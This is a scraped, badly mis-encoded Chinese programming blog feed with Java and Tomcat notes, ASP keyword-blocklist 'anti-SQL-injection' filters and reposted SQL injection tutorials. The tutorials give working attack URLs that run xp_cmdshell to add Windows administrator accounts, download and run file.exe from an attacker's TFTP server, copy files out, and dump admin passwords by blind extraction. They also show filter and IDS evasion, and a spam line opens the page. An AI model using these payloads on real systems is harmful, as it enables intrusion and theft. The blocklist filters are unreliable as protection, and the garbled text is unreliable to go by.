亚洲第一街区偷拍街拍,国产亚洲人成网站在线观看,激情亚洲一区国产精品

corejava��M��W�记

my java — Fri, 23 Jun 2006 05:25:00 GMT

�W�二�?Java�~�程环境
2.1安装java
1、java工具�?a >http://java.sun.com/j2se/1.4/install-windows.html
2、设�|�执行环境（windows 2000)
PATH=c:\jdk\bin;
3、安装库源文件和文档
jar xvf src.jar
jar xvf j2sdkversion-doc.zip

�W�一个java例子
eg:Weclome.java

public class Welcome
{
public static void main(String[] args)
{
String[] greeting=new String[3];
greeting[0]="Welcome to Core Java";
greeting[1]="by Car Horstman";
greeting[2]="and Gary Cornell";
for ( int i=0;iSystem.out.println(greeting[i]);
}
}

my java 2006-06-23 13:25 发表评论

my java — Fri, 23 Jun 2006 01:34:00 GMT

1、获得表单中文本框的数据�Q?br />mySmartUpload.getRequest().getParameter("applyusrname")
java.util.Enumeration e = mySmartUpload.getRequest().getParameterNames();

my java 2006-06-23 09:34 发表评论

防SQL注入

my java — Sun, 05 Feb 2006 02:23:00 GMT

<%
function sqlcheck(Str,errtype)
if Instr(LCase(Str),"select ") > 0 or Instr(LCase(Str),"insert ") > 0 or Instr(LCase(Str),"delete ") > 0 or Instr(LCase(Str),"delete from ") > 0 or Instr(LCase(Str),"count(") > 0 or Instr(LCase(Str),"drop table") > 0 or Instr(LCase(Str),"update ") > 0 or Instr(LCase(Str),"truncate ") > 0 or Instr(LCase(Str),"asc(") > 0 or Instr(LCase(Str),"mid(") > 0 or Instr(LCase(Str),"char(") > 0 or Instr(LCase(Str),"xp_cmdshell") > 0 or Instr(LCase(Str),"exec master") > 0 or Instr(LCase(Str),"net localgroup administrators") > 0 or Instr(LCase(Str),"and ") > 0 or Instr(LCase(Str),"net user") > 0 or Instr(LCase(Str),"or ") > 0 then
Response.write("")
Response.End
end if
Str=Replace(Str,"_","")     '�q��oSQL注入_
Str=Replace(Str,"*","")     '�q��oSQL注入*
Str=Replace(Str," ","")     '�q��oSQL注入�I�格
Str=Replace(Str,chr(34),"")   '�q��oSQL注入"
Str=Replace(Str,chr(39),"")            '�q��oSQL注入'
Str=Replace(Str,chr(91),"")            '�q��oSQL注入[
Str=Replace(Str,chr(93),"")            '�q��oSQL注入]
Str=Replace(Str,chr(37),"")            '�q��oSQL注入%
Str=Replace(Str,chr(58),"")            '�q��oSQL注入:
Str=Replace(Str,chr(59),"")            '�q��oSQL注入;
Str=Replace(Str,chr(43),"")            '�q��oSQL注入+
Str=Replace(Str,"{","")            '�q��oSQL注入{
Str=Replace(Str,"}","")            '�q��oSQL注入}
sqlcheck=Str            '�q�回�l�过上面字符替换后的Str
end function
%>

function SafeRequest(ParaName,ParaType)
'--- 传入参数 ---
'ParaName:参数名称-字符�?
'ParaType:参数�c�d��-数字�?1表示以上参数是数字，0表示以上参数为字�W?

Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "参数" & ParaName & "必须为数字型�Q?
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function

Function SafeRequest(ParaValue,ParaType)
       '--- 传入参数 ---
       'ParaName:参数名称-字符�?BR>       'ParaType:参数�c�d��-数字�?1表示以上参数是数字，0表示以上参数为字�W?

       'Dim ParaValue
       'ParaValue=Request(ParaName)函数里面是不要加引号
       If ParaType=1 then
              If not isNumeric(ParaValue) then
                   Response.write " 参数" & ParaName & "必须为数字型�Q?
                     Response.end
              End if
       Else
              ParaValue=replace(ParaValue,"'","")
     ParaValue=replace(ParaValue,";and 1=1","")
     ParaValue=replace(ParaValue,";and 1=2","")
     ParaValue=replace(ParaValue,";and user>0","")
     ParaValue=replace(ParaValue,">","")
     ParaValue=replace(ParaValue,"<","")
     ParaValue=replace(ParaValue,"=","")
     ParaValue=replace(ParaValue,"count","")
     ParaValue=replace(ParaValue,"select","")
     ParaValue=replace(ParaValue,"drop","")
     ParaValue=replace(ParaValue,"delect","")
     ParaValue=replace(ParaValue,"insert","")
     ParaValue=replace(ParaValue,"execute","")
     ParaValue=replace(ParaValue,"update","")
     ParaValue=replace(ParaValue,"mid","")
     ParaValue=replace(ParaValue,"exec","")
     ParaValue=replace(ParaValue,"master","")
     ParaValue=replace(ParaValue,"char","")
     ParaValue=replace(ParaValue,"declare","")
     ParaValue=replace(ParaValue,"*","")
     ParaValue=replace(ParaValue,"%","")
     ParaValue=replace(ParaValue,"chr","")
     ParaValue=replace(ParaValue,"truncate","")
       End if
       SafeRequest=ParaValue
End function
'调用方式
DirID=Request("DirID")'///数据目录名称参数/无则表示全部数据
DirID=SafeRequest(DirID,1)

Dim SQL_inbreakstr
SQL_inbreakstr = "'|or|and|exec|insert|select|delete|update|drop|count|*|%|chr|mid|master|truncate|char|declare"
SQL_inbreak = split(SQL_inbreakstr,"|")
R_Q=Request.QueryString
R_F=Request.Form
IF R_Q<>"" THEN
For i=0 To Ubound(SQL_inbreak)
  IF instr(R_Q,SQL_inbreak(i))>0 THEN
   Response.Write "*****"
                           Response.End
  END IF
Next
End IF

IF R_F<>"" THEN
For i=0 To Ubound(SQL_inbreak)
  IF instr(R_F,SQL_inbreak(i))>0 THEN
   Response.Write "*****"
                           Response.End
  END IF
Next
END IF

<%
'--------版权说明------------------
'SQL通用防注入程�?V2.0 完美�?BR>'本程序由火狐-枫知�U?独立开�?BR>'�Ҏ��E�序有�Q何疑问请联系本�h
'QQ:613548

'--------定义部䆾------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
'自定义需要过滤的字串,�?"�? 分隔
Fy_In = "'�?枫and枫exec枫insert枫select枫delete枫update枫count�?�?枫chr枫mid枫master枫truncate枫char枫declare"
'----------------------------------
%>

<%
Fy_Inf = split(Fy_In,"�?)
'--------POST部䆾------------------
If Request.Form<>"" Then
For Each Fy_Post In Request.Form

For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
'--------写入数据�?------�?-------
Fy_dbstr="DBQ="+server.mappath("SqlIn.mdb")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
Set Fy_db=Server.CreateObject("ADODB.CONNECTION")
Fy_db.open Fy_dbstr
Fy_db.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
Fy_db.close
Set Fy_db = Nothing
'--------写入数据�?------��?-------

Next
End If
'----------------------------------

'--------GET部䆾-------------------
If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString

For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
''--------写入数据�?------�?-------
Fy_dbstr="DBQ="+server.mappath("SqlIn.mdb")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
Set Fy_db=Server.CreateObject("ADODB.CONNECTION")
Fy_db.open Fy_dbstr
Fy_db.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','GET','"&Fy_Get&"','"&replace(Request.QueryString(Fy_Get),"'","''")&"')")
Fy_db.close
Set Fy_db = Nothing
'--------写入数据�?------��?-------

Response.Write ""
Response.Write "非法操作�Q�系�l�做了如下记录↓
"
Response.Write "操作�Q�Ｐ�Q?&Request.ServerVariables("REMOTE_ADDR")&"
"
Response.Write "操作旉��Q?&Now&"
"
Response.Write "操作��面�Q?&Request.ServerVariables("URL")&"
"
Response.Write "提交方式�Q�Ｇ�Q�Ｔ
"
Response.Write "提交参数�Q?&Fy_Get&"
"
Response.Write "提交数据�Q?&Request.QueryString(Fy_Get)
Response.End
End If
Next
Next
End If
'----------------------------------
%>

可以防止所有得sql注入�Q?BR>Function SafeRequest(ParaName,ParaType)
'--- 防止SQL注入 ---
'ParaName:参数名称-字符�?BR> 'ParaType:参数�c�d��-数字�?1表示以上参数是数字，0表示以上参数为字�W?
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "

参数" & ParaName & "必须为数字型�Q?
   Response.end
  End if
Else
  ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function
来源�Q?A >http://www.yesky.com/305/1899305.shtml

my java 2006-02-05 10:23 发表评论

桂林老兵的SQLSERVER高��注入技�?转帖)

my java — Sun, 05 Feb 2006 02:04:00 GMT

[获得数据表名][��字�D�值更��Cؓ表名�Q�再��x��d��q�个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条�g]

[获得数据表字�D�名][��字�D�值更��Cؓ字段名，再想法读��个字�D늚�值就可得到字�D�名]
update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条�g]

也可以这��h��L��获取表名�Q?/P>

select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',�?

通过SQLSERVER注入漏洞建数据库��理员帐号和�pȝ��理员帐号[当前帐号必须是SYSADMIN�l�]

news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //��d��数据库用��L��户test,密码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果��x��密码�Q�则用这句（��test的密码改�?23456�Q?BR>news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //��test加到sysadmin�l?�q�个�l�的成员可执行�Q何操�?BR>news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //��d��pȝ��用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //��系�l�用户test提升为管理员

�q�样�Q�你在他的数据库和系�l�内都留下了test��理员�̎号了

下面是如何从你的服器下蝲文�gfile.exe后运行它[前提是你必须��你的电脑设为TFTP服务器，��?9端口打开]

id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP get file.exe';--

然后�q�行�q�个文�g�Q?BR>id=2; exec master.dbo.xp_cmdshell 'file.exe';--

下蝲服务器的文�gfile2.doc到本地TFTP服务器[文�g必须存在]:

id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP Put file2.doc';--

�l�过IDS的检��[使用变量]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm�?’dshell' exec @a 'dir c:\'

my java 2006-02-05 10:04 发表评论

SQL注入天书

my java — Sun, 05 Feb 2006 01:58:00 GMT

随着B/S模式应用开发的发展�Q��用这�U�模式编写应用程序的�E�序员也��来��多。但是由于这个行业的入门门槛不高�Q�程序员的水�q�_��l�验也参差不齐，相当大一部分�E�序员在�~�写代码的时候，没有对用戯��入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一�D�|��据库查询代码�Q�根据程序返回的�l�果�Q�获得某些他惛_��知的数据�Q�这��是所谓的SQL Injection�Q�即�Q�I��Q�注入�?

�Q�I��Q�注入是从正常的WWW端口讉K��Q�而且表面看�v来跟一般的Web��面讉K��没什么区别，所以目前市面的防火墙都不会对Ｓ�Q�Ｌ注入发出警报�Q�如果管理员没查看IIS*志的习惯�Q�可能被入��R很长旉��都不会发觉�?

但是�Q�Ｓ�Q�Ｌ注入的手法相当灵�z�，在注入的时候会��到很多意外的情��c��能不能�Ҏ��具体情况�q�行分析�Q�构造��y妙的SQL语句�Q�从而成功获取想要的数据�Q�是高手与“菜鸟”的�Ҏ��区别�?

�Ҏ��国情�Q�国内的�|�站用ASP Access或SQLServer的占70%以上�Q�PHP MySQ占L20%�Q�其他的不��10%。在本文�Q�我们从分入门、进阶至高��讲解一下ASP注入的方法及技巧，PHP注入的文章由NB联盟的另一位朋友zwell撰写�Q�希望对安全工作者和�E�序员都有用处。了解ASP注入的朋友也请不要蟩�q�入门篇�Q�因为部分�h�Ҏ��入的基本判断�Ҏ��q�存在误区。大家准备好了吗�Q�Let's Go...

�?�?��?

如果你以前没试过�Q�I��Q�注入的话，那么�W�一步先把IE菜单=>工具=>Internet选项=>高��=>昄��友好HTTP 错误信息前面的勾��L��。否则，不论服务器返回什么错误，IE都只昄��为HTTP 500服务器错误，不能获得更多的提�C�Z��息�?

�W�一节、Ｓ�Q�Ｌ注入原理

以下我们从一个网www.19cn.com开始（注：本文发表前已征得该站站长同意�Q�大部分都是真实数据�Q��?

在网站首��上�Q�有名�ؓ“IE不能打开新窗口的多种解决�Ҏ��”的链接�Q�地址为：http://www.19cn.com/showdetail.asp?id=49�Q�我们在�q�个地址后面加上单引号’，服务器会�q�回下面的错误提�C�：

Microsoft JET Database Engine 错误 '80040e14'字符串的语法错误在查询表辑ּ� 'ID=49'' 中�?

/showdetail.asp�Q�行8

从这个错误提�C�我们能看出下面几点�Q?

1.�|�站使用的是Access数据库，通过JET引擎�q�接数据库，而不是通过ODBC�?

2. �E�序没有判断客户端提交的数据是否�W�合�E�序要求�?

3. 该SQL语句所查询的表中有一名�ؓID的字�D�c�?

从上面的例子我们可以知道�Q�Ｓ�Q�Ｌ注入的原理，��是从客��L��提交�Ҏ��的代码，从而收集程序及服务器的信息�Q�从而获取你惛_��得到的资料�?

�W�二节、判断能否进行Ｓ�Q�Ｌ注入

看完�W�一节，有一些�h会觉得：我也是经常这��h��试能否注入的�Q�这不是很简单吗�Q?

其实�Q�这�q�不是最好的�Ҏ��Q��ؓ什么呢�Q?
首先�Q�不一定每台服务器的IIS都返回具体错误提�C�给客户端，如果�E�序中加了cint(参数)之类语句的话�Q�Ｓ�Q�Ｌ注入是不会成功的�Q�但服务器同样会报错�Q�具体提�C�Z��息�ؓ处理 URL 时服务器上出错。请和系�l�管理员联络�?

其次�Q�部分对�Q�I��Q�注入有一点了解的�E�序员，认�ؓ只要把单引号�q��o掉就安全了，�q�种情况不�ؓ��数�Q�如果你用单引号��试�Q�是��不到注入点的那么，什么样的测试方法才是比较准��呢�Q�答案如下：

�?http://www.19cn.com/showdetail.asp?id=49

�?http://www.19cn.com/showdetail.asp?id=49 ;;and 1=1

�?http://www.19cn.com/showdetail.asp?id=49 ;;and 1=2

�q�就是经典的1=1�?=2��试法了�Q�怎么判断呢？看看上面三个�|�址�q�回的结果就知道了：

可以注入的表玎ͼ�

�?正常昄��Q�这是必然的�Q�不然就是程序有错误了）

�?正常昄��Q�内容基本与①相�?

�?提示BOF或EOF�Q�程序没做�Q何判断时�Q�、或提示找不到记录（判断了rs.eof�Ӟ��、或昄��内容为空�Q�程序加了on error resume next�Q�不可以注入��比较容易判断了�Q�①同样正常昄��Q�②和③一般都会有�E�序定义的错误提�C�，或提�C�类型�{换时出错�?

　　当然�Q�这只是传入参数是数字型的时候用的判断方法，实际应用的时候会有字�W�型和搜索型参数�Q�我��在中�񔽋�的“Ｓ�Q�Ｌ注入一般步骤”再做分析�?

�W�三节、判断数据库�c�d��及注入方�?

不同的数据库的函数、注入方法都是有差异的，所以在注入之前�Q�我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer�Q�网上超�q?9%的网站都是其中之一�?

怎么让程序告诉你它��用的什么数据库呢？来看看：

SQLServer有一些系�l�变量，如果服务器IIS提示没关闭，�q�且SQLServer�q�回错误提示的话�Q�那可以直接从出错信息获取，�Ҏ��如下�Q?

http://www.19cn.com/showdetail.asp?id=49;;and user>0

�q�句语句很简单，但却包含了SQLServer�Ҏ��注入�Ҏ��的精髓，我自�׃��是在一�ơ无意的��试中发现这�U�效率极高的猜解�Ҏ��。让我看来看看它的含义：首先�Q�前面的语句是正常的�Q�重点在anduser>0�Q�我们知道，user是SQLServer的一个内�|�变量，它的值是当前�q�接的用户名�Q�类型�ؓnvarchar。拿一个nvarchar的��D��int的数0比较�Q�系�l�会先试囑ְ�nvarchar的��D�{成int型，当然�Q��{的过�E�中肯定会出错，SQLServer的出错提�C�是�Q�将nvarchar�?”abc�?转换数据�c�d��?int 的列时发生语法错误，呵呵�Q�abc正是变量user的��|��q�样�Q�不废吹��C��力就拿到了数据库的用户名。在以后的篇�q�里�Q�大家会看到很多用这�U�方法的语句�?

��Z��说几句，众所周知�Q�SQLServer的用户sa是个�{�同Adminstrators权限的角�Ԍ��拿到了sa权限�Q�几乎肯定可以拿��C��机的Administrator了。上面的�Ҏ��可以很方便的��试出是否是用sa��d��Q�要注意的是�Q�如果是sa��d��Q�提�C�是��”dbo”�{换成int的列发生错误�Q�而不是”sa”�?

如果服务器IIS不允许返回错误提�C�，那怎么判断数据库类型呢�Q�我们可以从Access和SQLServer和区别入手，Access和SQLServer都有自己的系�l�表�Q�比如存放数据库中所有对象的表，Access是在�pȝ��表[msysobjects]中，但在Web环境下读该表会提�C�“没有权限”，SQLServer是在表[sysobjects]中，在Web环境�?

可正常读取�?

在确认可以注入的情况下，使用下面的语句：

http://www.19cn.com/showdetail.asp?id=49;;and(select count(*) from sysobjects)>0

http://www.19cn.com/showdetail.asp?id=49;;and(select count(*) from msysobjects)>0

如果数据库是SQLServer�Q�那么第一个网址的页面与原页�?A target=_blank>http://www.19cn.com/showdetail.asp?id=49是大致相同的�Q�而第二个�|�址�Q�由于找不到表msysobjects�Q�会提示出错�Q�就��程序有定w��处理�Q�页面也与原��面完全不同�?

如果数据库用的是Access�Q�那么情况就有所不同�Q�第一个网址的页面与原页面完全不同；�W�二个网址�Q�则视乎数据库设�|�是否允许读该系�l�表�Q�一般来说是不允许的�Q�所以与原网址也是完全不同。大多数情况下，用第一个网址��可以得知系�l�所用的数据库类型，�W�二个网址只作为开启IIS错误提示时的验证�?

�q?�?��?

在入门篇�Q�我们学会了�Q�I��Q�注入的判断�Ҏ��Q�但真正要拿到网站的保密内容�Q�是�q�远不够的。接下来�Q�我们就�l�箋学习如何从数据库中获取想要获得的内容�Q�首先，我们先看看Ｓ�Q�Ｌ注入的一般步骤：

�W�一节、Ｓ�Q�Ｌ注入的一般步�?

首先�Q�判断环境，��L��注入点，判断数据库类型，�q�在入门��已�l�讲�q�了�?

其次�Q�根据注入参数类型，在脑��中重构SQL语句的原貌，按参数类型主要分��Z��面三�U�：

(A) ID=49 �q�类注入的参数是数字型，SQL语句原貌大致如下�Q?
Select * from 表名 where 字段=49
注入的参��CؓID=49 And [查询条�g]�Q�即是生成语句：
Select * from 表名 where 字段=49 And [查询条�g]

(B) Class=�q�箋�?�q�类注入的参数是字符型，SQL语句原貌大致概如下：
Select * from 表名 where 字段=’连�l�剧�?
注入的参��CؓClass=�q�箋剧�?and [查询条�g] and ‘�?�?�Q�即是生成语句：
Select * from 表名 where 字段=’连�l�剧�?and [查询条�g] and ‘�?’�?

(C) 搜烦时没�q��o参数的，如keyword=关键字，SQL语句原貌大致如下�Q?
Select * from 表名 where 字段like �?关键�?�?
注入的参��Cؓkeyword=�?and [查询条�g] and �?�?’， ��x��生成语句�Q?
Select * from 表名 where字段like �?�?and [查询条�g] and �?�?�?�?

接着�Q�将查询条�g替换成SQL语句�Q�猜解表名，例如�Q?

ID=49 And (Select Count(*) from Admin)>=0

如果��面��׃��ID=49的相同，说明附加条�g成立�Q�即表Admin存在�Q�反之，即不存在�Q�请牢记�q�种�Ҏ��Q��?

如此循环�Q�直至猜到表名�ؓ止�?

表名猜出来后�Q�将Count(*)替换成Count(字段�?�Q�用同样的原理猜解字�D�名�?

有�h会说�Q�这里有一些偶然的成分�Q�如果表名�v得很复杂没规律的�Q�那�Ҏ��没得玩下去了。说得很对，�q�世界根本就不存�?00%成功的黑客技术，苍蝇不叮无缝的蛋�Q�无论多技术多高深的黑客，都是因�ؓ别�h的程序写得不严密或��用者保密意识不够，才有得下手�?

有点跑题了，话说回来�Q�对于SQLServer的库�Q�还是有办法让程序告诉我们表名及字段名的�Q�我们在高�񔽋�中会做介绍�?

最后，在表名和列名猜解成功后，再��用SQL语句�Q�得出字�D늚��|��下面介绍一�U�最常用的方法－Ascii逐字解码法，虽然�q�种�Ҏ��速度很慢�Q�但肯定是可行的�Ҏ��?

我们举个例子�Q�已知表Admin中存在username字段�Q�首先，我们取第一条记录，��试长度�Q?

http://www.19cn.com/showdetail.asp?id=49;;and (select top 1 len(username) from Admin)>0

先说明原理：如果top 1的username长度大于0�Q�则条�g成立�Q�接着��是>1�?gt;2�?gt;3�q�样��试下去�Q�一直到条�g不成立�ؓ止，比如>7成立�Q?gt;8不成立，��是len(username)=8

　　当然没�h会笨得从0,1,2,3一个个��试�Q�怎么��h��比较快就看各自发挥了。在得到username的长度后�Q�用mid(username,N,1)截取�W�N位字�W�，再asc(mid(username,N,1))得到ASCII码，比如�Q?

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同样也是用逐步�~�小范围的方法得到第1位字�W�的ASCII码，注意的是英文和数字的ASCII码在1-128之间�Q�可以用折半法加速猜解，如果写成�E�序��试�Q�效率会有极大的提高�?

�W�二节、Ｓ�Q�Ｌ注入常用函数

有SQL语言基础的�h�Q�在�Q�I��Q�注入的时候成功率比不熟悉的�h高很多。我们有必要提高一下自��q��SQL水��^�Q�特别是一些常用的函数及命令�?

Access�Q�asc(字符) SQLServer�Q�unicode(字符)

作用�Q�返回某字符的ASCII�?

Access�Q�chr(数字) SQLServer�Q�nchar(数字)

作用�Q�与asc相反�Q�根据ASCII码返回字�W?

Access�Q�mid(字符�?N,L) SQLServer�Q�substring(字符�?N,L)

作用�Q�返回字�W�串从N个字�W��v长度为L的子字符�Ԍ��即N到N L之间的字�W�串

Access�Q�abc(数字) SQLServer�Q�abc (数字)

作用�Q�返回数字的�l�对��|��在猜解汉字的时候会用到�Q?

Access�Q�A between B And C SQLServer�Q�A between B And C

作用�Q�判断A是否界于B与C之间

�W�三节、中文处理方�?

在注入中��到中文字符是常有的事，有些��Z��到中文字符��想打退堂鼓了。其实只要对中文的编码有所了解�Q�“中文恐惧症”很快可以克服�?

先说一点常识：

Access中，中文的ASCII码可能会出现负数�Q�取��负数后用abs()取绝对��|��汉字字符不变�?

SQLServer中，中文的ASCII为正敎ͼ�但由于是UNICODE的双位编码，不能用函数ascii()取得ASCII码，必须用函数unicode ()�q�回unicode��|��再用nchar函数取得对应的中文字�W��?

了解了上面的两点后，是不是觉得中文猜解其实也跟英文差不多呢？除了使用的函数要注意、猜解范围大一点外�Q�方法是没什么两��L��?

�?�U?��?

看完入门��和�q�阶��后�Q�稍加练习，破解一般的�|�站是没问题了。但如果��到表名列名猜不刎ͼ�或程序作者过滤了一些特�D�字�W�，怎么提高注入的成功率�Q�怎么��h��高猜解效率？请大家接着往下看高�񔽋��?

�W�一节、利用系�l�表注入SQLServer数据�?

SQLServer是一个功能强大的数据库系�l�，与操作系�l�也有紧密的联系�Q�这�l�开发者带来了很大的方便，但另一斚w��Q�也为注入者提供了一个蟩板，我们先来看看几个具体的例子：

�?http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add�?-

　　分号;在SQLServer中表�C�隔开前后两句语句�Q?-表示后面的语句�ؓ注释�Q�所以，�q�句语句在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储�q�程xp_cmdshell�Q�这个存储过�E�用于调用系�l�命令，于是�Q�用net命��o新徏了用户名为name、密码�ؓpassword的windows的帐��P��接着�Q?

�?http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators/add�?-

　　��新建的帐号name加入��理员组�Q�不用两分钟�Q�你已经拿到了系�l�最高权限！当然�Q�这�U�方法只适用于用sa�q�接数据库的情况�Q�否则，是没有权限调用xp_cmdshell的�?

　　�?http://Site/url.asp?id=1 ;;and db_name()>0

前面有个�c�M��的例子and user>0�Q�作用是获取�q�接用户名，db_name()是另一个系�l�变量，�q�回的是�q�接的数据库名�?

�?http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db�?--�q�是相当狠的一招，从③拿到的数据库名，加上某些IIS出错暴露出的�l�对路径�Q�将数据库备份到Web目录下面�Q�再用HTTP把整个数据库��完完整整的下蝲回来�Q�所有的��理员及用户密码都一览无遗！在不知道�l�对路径的时候，�q�可以备份到�|�络地址的方法（�?A href="http://file:///202.96.xx.xxShare1.db" target=_blank>\\202.96.xx.xx\Share\1.db�Q�，但成功率不高�?

　　�?http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’and status>0)>0

前面说过�Q�sysobjects是SQLServer的系�l�表�Q�存储着所有的表名、视图、约束及其它对象�Q�xtype=’U’and status>0�Q�表�C�用户徏立的表名�Q�上面的语句��第一个表名取出，�?比较大小�Q�让报错信息把表名暴露出来。第二、第三个表名怎么获取�Q�还是留�l�我们聪明的读者思考吧�?

�?http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名�?,1) from sysobjects)>0

从⑤拿到表名后，用object_id(‘表名�?获取表名对应的内部ID�Q�col_name(表名ID,1)代表该表的第1个字�D�名�Q�将1换成2,3,4...��可以逐个获取所猜解表里面的字段名�?

　　以上6�Ҏ��我研�I�SQLServer注入半年多以来的心血�l�晶�Q�可以看出，对SQLServer的了解程度，直接影响着成功率及猜解速度。在我研�I�SQLServer注入之后�Q�我在开发方面的水��^也得到很大的提高�Q�呵呵，也许安全与开发本来就是相辅相成的吧�?

�W�二节、绕�q�程序限制��l�注�?

在入门篇提到�Q�有很多人喜�Ƣ用’号��试注入漏洞�Q�所以也有很多�h用过滤’号的方法来“防止”注入漏�z�，�q�也许能挡住一些入门者的��d��Q�但对Ｓ�Q�Ｌ注入比较熟悉的�h�Q�还是可以利用相关的函数�Q�达到绕�q�程序限制的目的�?

在“Ｓ�Q�Ｌ注入的一般步骤”一节中�Q�我所用的语句�Q�都是经�q�我优化�Q�让其不包含有单引号的；在“利用系�l�表注入SQLServer数据库”中�Q�有些语句包含有’号�Q�我们�D个例子来看看怎么攚w��这些语句：

��单的如where xtype=’U’，字符U对应的ASCII码是85�Q�所以可以用where xtype=char(85)代替�Q�如果字�W�是中文的，比如where name=’用户’，可以用where name=nchar(29992) nchar(25143)代替�?

�W�三节、经验小�l?

1.有些��Z��q��oSelect、Update、Delete�q�些关键字，但偏偏忘记区分大��写�Q�所以大家可以用selecT�q�样��试一下�?

2.在猜不到字段名时�Q�不妨看看网站上的登录表单，一般�ؓ了方便�v见，字段名都与表单的输入框取相同的名字�?

3.特别注意�Q�地址栏的号传入程序后解释为空��|��+解释�?��P��%解释�?��P��具体可以参考URLEncode的相关介�l��?

4.用Get�Ҏ��注入�Ӟ��IIS会记录你所有的提交字符�Ԍ��对Post�Ҏ��做则不记录，所以能用Post的网址��量不用Get�?

5. 猜解Access时只能用Ascii逐字解码法，SQLServer也可以用�q�种�Ҏ��Q�只需要两者之间的区别卛_��Q�但是如果能用SQLServer的报错信息把值暴露出来，那效率和准确率会有极大的提高�?

�?�?�?�?

�Q�I��Q�注入漏�z�可谓是“千里之堤，溃于蚁穴”，�q�种漏洞在网上极为普遍，通常是由于程序员�Ҏ��入不了解�Q�或者程序过滤不严格�Q�或者某个参数忘记检查导致。在�q�里�Q�我�l�大家一个函敎ͼ�代替ASP中的Request函数�Q�可以对一切的SQL注入Say NO�Q�函数如下：

function SafeRequest(ParaName,ParaType)
'--- 传入参数 ---
'ParaName:参数名称-字符�?
'ParaType:参数�c�d��-数字�?1表示以上参数是数字，0表示以上参数为字�W?

Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "参数" & ParaName & "必须为数字型�Q?
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function

文章到这里就�l�束了，不管你是安全人员、技术爱好者还是程序员�Q�我都希望本文能对你有所帮助�?BR>

my java 2006-02-05 09:58 发表评论

UC

my java — Thu, 02 Feb 2006 03:17:00 GMT

43828348

http://www.wsmmz.net

http://www.sooweb.net/Html/Soft/82.html

http://www.hnwuyun.com/jc/

http://club.cat898.com/newbbs/printpage.asp?BoardID=18&ID=760319

http://lsdw.go1.icpcn.com/pstg/6.htm

http://font.flash8.net/font/list.aspx?page=3&c_id=383&s_id=395

my java 2006-02-02 11:17 发表评论

电脑�~�程技巧与�l�护

my java — Thu, 26 Jan 2006 03:16:00 GMT

http://www.comprg.com.cn

http://supercss.com/

my java 2006-01-26 11:16 发表评论

配置ssl in tomcat

my java — Wed, 02 Nov 2005 07:21:00 GMT

1、创��书钥匙库�Q?BR>
keytool -genkey -alias tomcat -keyalg RSA

�~�省证书文�g名�ؓ�Q?keystore

2、修�Ҏ��件server.xml
               maxThreads="150" minSpareThreads="25" maxSpareThreads="75"
               enableLookups="false" disableUploadTimeout="true"
               acceptCount="100" debug="0" scheme="https" secure="true"
               clientAuth="false"
      keystoreFile="C:\keystore\.keystore"
      keystorePass="netscape"
      sslProtocol="TLS" />

3、web.xml

Purchase

/ssl/*

registered-user

CONFIDENTIAL

Account Deletion

/admin/delete-account.jsp

administrator

FORM

/admin/login.jsp

/admin/login-error.jsp

4、重启tomcat

my java 2005-11-02 15:21 发表评论

ListEmpAction

my java — Tue, 27 Sep 2005 05:21:00 GMT

/*
* Created on 2005-9-27
*
* TODO To change the template for this generated file go to
* Window - Preferences - Java - Code Style - Code Templates
*/
package fibernews.action;
import javax.servlet.http.*;

import java.sql.*;
import java.util.*;
import fibernews.framework.db.*;
import fibernews.beans.Employee;
import fibernews.util.function.HandleString;
import fibernews.framework.logging.Logger;

/**
* @author Administrator
*
* TODO To change the template for this generated type comment go to
* Window - Preferences - Java - Code Style - Code Templates
*/
public class ListEmpAction extends Action {

List list ;
